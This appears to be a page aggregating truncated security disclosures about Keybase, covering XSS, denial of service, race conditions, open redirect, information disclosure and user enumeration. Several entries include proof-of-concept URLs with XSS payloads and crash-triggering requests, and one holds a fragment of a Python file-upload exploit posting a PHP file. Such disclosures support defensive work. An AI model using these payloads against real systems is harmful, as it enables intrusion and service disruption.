Keybase: Persistent XSS on keybase.io via "payload" field in `/user/sigchain_signature.toffee` template

Issue Keybase allows you to see other users' sigchains by navigating to /sigchain. The "Payload" field containing JSON related to the chainlink on the right side of the page is not correctly escaped during templating, leading to a persistent XSS as users have a high degree of control over the...

Downgrade Attack

github.com/keybase/client is vulnerable to downgrade attack. This attack is possible because the library does not validate the version signature prefixes...

Keybase: Universal Cross-Site Scripting in Keybase Chrome extension

Description The Keybase Chrome extension makes heavy use of the insecure innerHTML DOM API, resulting in Universal Cross-Site Scripting on all Keybase-supported social networking websites. Steps to reproduce the issue 1. Install the Keybase Chrome extension 2. Navigate to the following URL addres...

Keybase - Customized SSL, Dangerous filesystem permissions, Redefined SSL Common Names verifier vulnerabilities

HackApp vulnerability scanner discovered that application Keybase published at the 'play' market has multiple vulnerabilities...

Keybase Extension Brings End-to-End Encrypted Chat To Twitter, Reddit, GitHub

A recently released Chrome extension, developed by the public key crypto database Keybase, brought end-to-end encrypted messaging to several apps this week. Keybase, a service that allows users to identify themselves with a public encryption key, introduced its end-to-end encrypted chat feature...

Malware exploit: Keybase

Type: Upload vulnerability Author: Unit42 import requests import sys if lensys.argv != 2: print "Usage: %s phpfile" % file sys.exit1 URL = "" print "Sending request..." multiplefiles = 'file', 'WIN-JJFOIJGL6514222.php', opensys.argv1, 'rb' r = requests.postURL + "image/upload.php",...

Keybase: Denial of Service through set_preference.json

Hey there, When selecting an image at https://keybase.io//api/1.0/image/setpreference.json, passing an invalid value in identitysrc knocks the server down for 20-30 seconds, with just one request. I have verified this by visiting an external website that checks if a website is down. POC: 1. Conne...

Keybase: Register multiple users using one invitation (race condition)

Hi, It is possible to create multiple accounts using a single invitationid due to a race condition bug in //api/1.0/signup.json. I have successfully created 8 accounts using invitation with id = 37c5a121adf23e90b875500d The account usernames: novijosiptest1,2,4,5,6,8,9,10 you can delete them, I...

Keybase: Content spoofing due to the improper behavior of the not-found meesage

Hay , At dist.keybase.io , It's possible to inject text in the not-found message in order to trick the user to make him visit website or do something an attacker might be interested in . PoC : https://goo.gl/3WO6iH I've shortened this one because it's really long , it's needed to be on google...

Keybase: Race conditions can be used to bypass invitation limit

Hi, I have received 3 invites from Chris I might have screwed up the PGP email, but thanks anyway, added to my account https://keybase.io/josipfranjkovic. Using race conditions, I was able to send out a total of 7 invites to my throwaway emails, obviously bypassing the 3 invitations limit. Here a...

Keybase: Remote Server Restart Lead to Denial of Service by only one Request.

https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5419 Poc: set wrong uid in this examble i chabge last numbre from 9 to 8 https://keybase.io//api/1.0/getsalt.json?uid=36965a2dc9bbd814e8558a77040c5418...

Keybase: Remote Server Restart Lead to Denial of Server by only one Request.

URL === https://keybase.io//api/1.0/merkle/block.json?hash=68b5d3599be9acbe97bcc45603a322f85f8a99b9cbc696592fe1088c3a099a45d929f0bc2fae2230f0b31b5e4b4122365f50b34fcf91a94a357df90a83e3b013 Poc: ==== https://keybase.io//api/1.0/merkle/block.json?hash=1 see video...

keybase.io XSS vulnerability

Vulnerable URL: https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSSPOSED/...

Keybase: Un-handled exception leads to Information Disclosure

Steps: 1. Login to https://keybase.io/ 2. Click on Me icon from top-right button https://keybase.io/username 3. Click on Edit picture button https://keybase.io/usernameedit-me 4. Intercept the traffic using proxy tool e,g, Burp Suite 5. Click on "Prove my Twitter identity" link 6. In the request,...

Keybase: xss

This xss issue only affects content sniffing browsers older versions that don't see the X-Content-Type-Options: nosniff header that you're sending. https://keybase.io//api/1.0/user/lookup.json?usernames=fakeuser1%2cfakeuser2'%22%26%25prompt/XSS/ This returns a page that contains this information:...

Keybase: [keybase.io] Open Redirect

PoC https://keybase.io//www.google.com/%2f%2e%2e HTTP Response: HTTP/1.1 303 See Other ... Location: //www.google.com/%2f%2e%2e/...

Keybase: Sensitive server-side/application information disclosure

There is an Information disclosure vulnerability present in Keybase API request whenever an exception occurs. Steps to reproduce: Open the following URL in any browser - https://keybase.io//api/1.0/user/lookup.json?twitter=john&github=john&usernames=john&usernames=rock Observe that when we add...

Keybase: Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json

When we send a POST-request to https://keybase.io//api/1.0/invitationrequest.json with multiple fullname parameters, for example: [email protected]&fullname=1&fullname=2 we get an error response, which contains infromation about the server paths and code: TypeError: Object 1,2 has no method...

Keybase: No rate limiting for sensitive actions (like "forgot password") enables user enumeration

Hi there, I noticed a small information leak which allows an attacker to check whether an email address is associated with an account. Steps to reproduce: Send a POST-Request to the url POST //api/1.0/send-reset-pw.json HTTP/1.1 as the following example shows: POST //api/1.0/send-reset-pw.json...

Keybase: SMTP protection not used

Hi I'm checking your website found spf record there. You should apply strict SMPT policy to stop spoofed email sending from your domain. An attacker would send a Fake email from [email protected] saying that Please change your password, The victim is aware of phishing attacks, But when he sees...